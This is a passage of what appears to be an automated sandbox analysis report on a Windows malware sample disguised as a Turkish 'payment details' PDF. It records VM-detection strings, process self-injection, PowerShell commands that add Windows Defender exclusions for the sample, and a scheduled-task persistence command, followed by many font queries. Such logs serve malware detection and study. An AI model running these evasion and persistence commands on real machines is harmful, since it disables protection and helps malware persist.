                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.427513871.0000000002F91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.427513871.0000000002F91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeMemory written: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OsAcNRt.exe
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OsAcNRt.exe
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OsAcNRt.exe
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OsAcNRt" /XML "C:\Users\user\AppData\Local\Temp\tmp9B9E.tmp
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess created: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
